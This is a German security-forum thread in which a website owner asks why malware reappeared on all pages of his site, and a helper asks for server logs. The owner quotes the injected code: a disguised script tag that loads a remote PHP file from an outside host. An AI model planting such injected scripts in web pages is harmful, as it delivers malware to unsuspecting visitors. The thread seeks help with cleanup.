Zurück   Trojaner-Board > Malware entfernen > Überwachung, Datenschutz und Spam

Überwachung, Datenschutz und Spam: Malware auf Website

Windows 7 Fragen zu Verschlüsselung, Spam, Datenschutz & co. sind hier erwünscht. Hier geht es um Abwehr von Keyloggern oder aderen Spionagesoftware wie Spyware und Adware. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Benötigst du Hilfe beim Trojaner entfernen oder weil du dir einen Virus eingefangen hast, erstelle ein Thema in den oberen Bereinigungsforen.

Antwort
Alt 14.01.2013, 17:00   #1
ffm08
 
Malware auf Website - Standard

Malware auf Website



Hallo zusammen,
ich hatte Malware auf meine Website, ich hab es enfernet und FTP daten geändert. 3 wochen später war es wieder auf meiner Website:
Hier das Malware code:
<!--c3284d--><script type="text/javascript" src="hxxp://node1.hostingstatics.org/modules/ad.php?id=5" name="gastats"></script><!--/c3284d-->

ich verwenden keinen cms und alle meine Unterseiten ca.(40 seiten) wurden identifiziert.
weiß jemand woran das liegt?
danke

Alt 14.01.2013, 17:16   #2
markusg
/// Malware-holic
 
Malware auf Website - Standard

Malware auf Website



hi
wie heißt die seite? gibts logs des servers? evtl. kann man damit was rausfinden
__________________

__________________

Antwort

Themen zu Malware auf Website
code, daten, ftp, hallo zusammen, ide, malware, script, verwenden, website, woche, wochen, woran, zusammen




Ähnliche Themen: Malware auf Website


  1. Malwarebytes Anti-Malware meldet als bösartige Website blockiert
    Plagegeister aller Art und deren Bekämpfung - 21.10.2015 (13)
  2. Windows 8.1 + Firefox 38.0.1: Request an Malware-gelistete Seite bei Aufruf von beliebiger Website
    Log-Analyse und Auswertung - 31.05.2015 (3)
  3. Website hängt
    Plagegeister aller Art und deren Bekämpfung - 07.03.2014 (35)
  4. Windows 7: Avast meldet bei JEDER Website "schädliche Website blockiert"!
    Plagegeister aller Art und deren Bekämpfung - 02.02.2014 (20)
  5. Seltsame Website
    Plagegeister aller Art und deren Bekämpfung - 05.04.2013 (10)
  6. Trojaner auf Website
    Plagegeister aller Art und deren Bekämpfung - 19.02.2013 (5)
  7. email link Malware Funde Heur.PE@4294967295, Malware@#nwdk01o66rpro, Malware@#2x6qrvr63cjrw
    Plagegeister aller Art und deren Bekämpfung - 29.10.2012 (10)
  8. Zugriff für potentiell gefährlicher Website geblockt - Anti-Malware
    Plagegeister aller Art und deren Bekämpfung - 29.06.2012 (1)
  9. Rogue-Malware und "malicious website"
    Plagegeister aller Art und deren Bekämpfung - 30.10.2011 (4)
  10. Angriff auf Website
    Diskussionsforum - 26.08.2011 (1)
  11. Meldung von website
    Plagegeister aller Art und deren Bekämpfung - 12.07.2011 (1)
  12. Wie Malware auf Website identifizieren?
    Plagegeister aller Art und deren Bekämpfung - 24.02.2011 (5)
  13. Trojaner auf Website ?
    Plagegeister aller Art und deren Bekämpfung - 09.12.2010 (1)
  14. Trojanermeldung auf Website
    Plagegeister aller Art und deren Bekämpfung - 07.12.2010 (0)
  15. martuz.cn auf website
    Plagegeister aller Art und deren Bekämpfung - 09.06.2009 (4)
  16. Website
    Netzwerk und Hardware - 08.07.2007 (11)
  17. website fewer
    Log-Analyse und Auswertung - 18.04.2005 (4)

Zum Thema Malware auf Website - Hallo zusammen, ich hatte Malware auf meine Website, ich hab es enfernet und FTP daten geändert. 3 wochen später war es wieder auf meiner Website: Hier das Malware code: <!--c3284d--><script - Malware auf Website...
Archiv
Du betrachtest: Malware auf Website auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.